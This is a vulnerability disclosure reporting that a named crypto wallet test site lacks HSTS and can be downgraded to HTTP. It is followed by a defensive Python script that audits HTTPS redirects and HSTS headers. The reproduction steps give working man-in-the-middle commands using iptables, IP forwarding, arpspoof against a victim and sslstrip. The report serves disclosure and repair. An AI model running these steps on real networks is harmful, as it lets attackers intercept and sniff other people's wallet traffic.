Vulnerability: Wallet is Vulnerable to MiTM Attack/SSLStrip Attack (Hacking HTTPS)
Description: It was observed that the wallet is vulnerable to a MiTM (Man in The Middle) Attack. This means an attacker can intercept the connection between a web browser and a trusted wallet by forcing the wallet to load without utilizing SSL/TLS.
Vulnerable Application: Wallet https://wallet-test.aelf.io
Severity: High
Steps to Reproduce:
1- Enter the below command in a Linux command prompt: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
2- Now use the below command to enable forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
3- Now use arpspoofing for the target victim: arpspoof -i eth0 -t victim ip gateway ip
4- You should now see that arpspoof is running. Now, in a separate terminal window, type the following command: sslstrip -l 8080
5- When the victim tries to access wallet-test.aelf.io it will load over HTTP.
Or
Check for the presence of HSTS in the response header.
Impact: An attacker can force the wallet to utilize HTTP. Once the wallet is over HTTP then an attacker can sniff the communication.
Fix: The following are recommendations to protect against SSLStrip and similar attacks:
1- Enable HSTS
2- Enable HTTPS throughout the website
Screenshot: Shows wallet is NOW accessible over HTTP
Attack Reference: Reference link to understand more about this issue:
https://www.cybrary.it/0p3n/sslstrip-in-man-in-the-middle-attack/
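A way to verify the two recommended fixes from the defender's side, as an added example that is not part of the original report: it parses a Strict-Transport-Security value as RFC 6797 describes and audits one host's plain-HTTP and HTTPS responses. The function names, the finding labels, the 180-day threshold and the sample responses for `wallet.example` are assumptions made for illustration.

```python
import re

MIN_MAX_AGE = 15552000  # 180 days; assumed policy threshold, not from the report

def parse_hsts(value):
    """Parse a Strict-Transport-Security value; return None if it is invalid."""
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, arg = part.partition("=")
        name = name.strip().lower()          # directive names are case-insensitive
        if name in directives:
            return None                      # a repeated directive invalidates the header
        directives[name] = arg.strip().strip('"')
    if not re.fullmatch(r"\d+", directives.get("max-age", "")):
        return None                          # max-age is mandatory and must be digits
    return {"max_age": int(directives["max-age"]),
            "include_subdomains": "includesubdomains" in directives,
            "preload": "preload" in directives}

def audit(http_status, http_headers, https_headers):
    """Return findings for one host from its port-80 and port-443 responses."""
    findings = []
    http = {k.lower(): v for k, v in http_headers.items()}
    https = {k.lower(): v for k, v in https_headers.items()}
    location = http.get("location", "").lower()
    if http_status not in (301, 302, 307, 308) or not location.startswith("https://"):
        findings.append("http-not-redirected-to-https")
    # Browsers ignore HSTS received over plain HTTP, so only the HTTPS response counts.
    policy = parse_hsts(https.get("strict-transport-security", ""))
    if policy is None:
        findings.append("hsts-missing-or-invalid")
    elif policy["max_age"] < MIN_MAX_AGE:
        findings.append("hsts-max-age-too-short")  # max-age=0 removes the policy entirely
    return findings

if __name__ == "__main__":
    # Constructed sample responses, not captured from the reported host.
    before = audit(200, {"Content-Type": "text/html"}, {"Content-Type": "text/html"})
    after = audit(301, {"Location": "https://wallet.example/"},
                  {"Strict-Transport-Security": "max-age=31536000; includeSubDomains"})
    print("before fix:", before)
    print("after fix: ", after)
```

A redirect alone still leaves the first plain-HTTP request open to stripping, which is why the audit reports the redirect and the HSTS policy as separate findings.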

